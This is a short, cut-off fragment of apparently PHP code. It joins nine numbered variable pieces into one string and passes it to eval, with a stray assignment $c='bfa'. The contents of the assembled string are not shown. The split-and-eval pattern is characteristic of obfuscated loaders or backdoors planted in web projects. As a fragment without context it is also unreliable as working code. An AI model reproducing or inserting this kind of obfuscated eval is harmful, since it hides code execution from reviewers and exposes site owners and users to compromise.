$bfa1707.$bfa1708.$bfa1709.$bfa1710.$bfa1711.
$bfa1712.$bfa1713.$bfa1714.$bfa1715;$c='bfa';eval $bfa;